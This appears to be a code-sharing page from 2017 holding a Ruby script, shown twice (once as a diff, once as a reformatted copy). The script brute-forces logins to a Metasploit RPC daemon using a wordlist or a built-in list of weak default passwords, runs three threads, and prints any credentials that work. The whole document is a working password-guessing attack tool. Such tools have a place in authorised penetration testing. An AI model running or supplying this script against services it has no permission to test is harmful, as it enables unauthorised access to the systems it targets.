bcoles · July 5, 2017 16:27
diff --git a/msfrpcd-brute.rb b/msfrpcd-brute.rb
 #!/usr/bin/env ruby
 #
 # MSF RPC login brute force
 #
 require 'msfrpc-client'
 require 'thread'

 MAX_THREADS = 3

 puts 'MSF RPC login brute force'
 puts '---'

 # usage
 if ARGV.length < 2
  puts "Usage: ./brute-msfrpcd.rb <host> <port> <user> <ssl> [/path/to/wordlist.txt]"
  exit 1
 end

 # parse target
 @host = ARGV[0] || '127.0.0.1'
 @port = ARGV[1] || '55552'
 @user = ARGV[2] || 'msf'
 @ssl  = ARGV[3] || true

 # parse wordlist
 file = ARGV[4]
 @wordlist = []
 if file.nil?
  @wordlist = ['msf', 'password', '1234', '12345', 'msfchangeme', 'abc123', 'test', 'pass123', 'myPassword', 'msfpassword']
  puts "* No wordlist specified. Using default list (#{@wordlist.length} words)"
 else
  f = File.open(file).each_line do |line|
    @wordlist << line.chomp!
  end
  f.close
  puts "* Using wordlist '#{file}' (#{@wordlist.length} words)"
 end

 def main
  puts "* Starting MSF RPC login brute force for user '#{@user}'"
  work_queue = Queue.new
  @wordlist.each {|pass| work_queue << pass}
  workers = (0...MAX_THREADS).map do
    Thread.new do
      begin
        while pass = work_queue.pop(true)
          if login pass
            Thread.list.each do |thread|
              thread.exit unless thread == Thread.current
            end
            break
          end
        end
      rescue ThreadError
      end
    end
  end
  workers.map(&:join)
 end

 def login pass
  puts "* Trying: #{pass}"
  begin
    rpc = Msf::RPC::Client.new :host => @host,
                               :port => @port,
                               :user => @user,
                               :pass => pass,
                               :ssl  => @ssl
  rescue Rex::ConnectionRefused => e
    puts '- Error: Connection refused'
    exit 1
  rescue Msf::RPC::ServerException => e
    return false if e.message =~ /Login Failed/
    puts "- Error: connection failed: #{e}"
  end

  return false if rpc.token.nil?
  puts "+ Login success: '#{@user}' : '#{pass}'"
  true
 ensure
  rpc.close rescue nil
 end

 main
	#!/usr/bin/env ruby
	#
	# MSF RPC login brute force
	#
	require 'msfrpc-client'
	require 'thread'

	MAX_THREADS = 3

	puts 'MSF RPC login brute force'
	puts '---'

	# usage
	if ARGV.length < 2
	puts "Usage: ./brute-msfrpcd.rb <host> <port> <user> <ssl> [/path/to/wordlist.txt]"
	exit 1
	end

	# parse target
	@host = ARGV[0] \|\| '127.0.0.1'
	@port = ARGV[1] \|\| '55552'
	@user = ARGV[2] \|\| 'msf'
	@ssl = ARGV[3] \|\| true

	# parse wordlist
	file = ARGV[4]
	@wordlist = []
	if file.nil?
	@wordlist = ['msf', 'password', '1234', '12345', 'msfchangeme', 'abc123', 'test', 'pass123', 'myPassword', 'msfpassword']
	puts "* No wordlist specified. Using default list (#{@wordlist.length} words)"
	else
	f = File.open(file).each_line do \|line\|
	@wordlist << line.chomp!
	end
	f.close
	puts "* Using wordlist '#{file}' (#{@wordlist.length} words)"
	end

	def main
	puts "* Starting MSF RPC login brute force for user '#{@user}'"
	work_queue = Queue.new
	@wordlist.each {\|pass\| work_queue << pass}
	workers = (0...MAX_THREADS).map do
	Thread.new do
	begin
	while pass = work_queue.pop(true)
	if login pass
	Thread.list.each do \|thread\|
	thread.exit unless thread == Thread.current
	end
	break
	end
	end
	rescue ThreadError
	end
	end
	end
	workers.map(&:join)
	end

	def login pass
	puts "* Trying: #{pass}"
	begin
	rpc = Msf::RPC::Client.new :host => @host,
	:port => @port,
	:user => @user,
	:pass => pass,
	:ssl => @ssl
	rescue Rex::ConnectionRefused => e
	puts '- Error: Connection refused'
	exit 1
	rescue Msf::RPC::ServerException => e
	return false if e.message =~ /Login Failed/
	puts "- Error: connection failed: #{e}"
	end

	return false if rpc.token.nil?
	puts "+ Login success: '#{@user}' : '#{pass}'"
	true
	ensure
	rpc.close rescue nil
	end

	main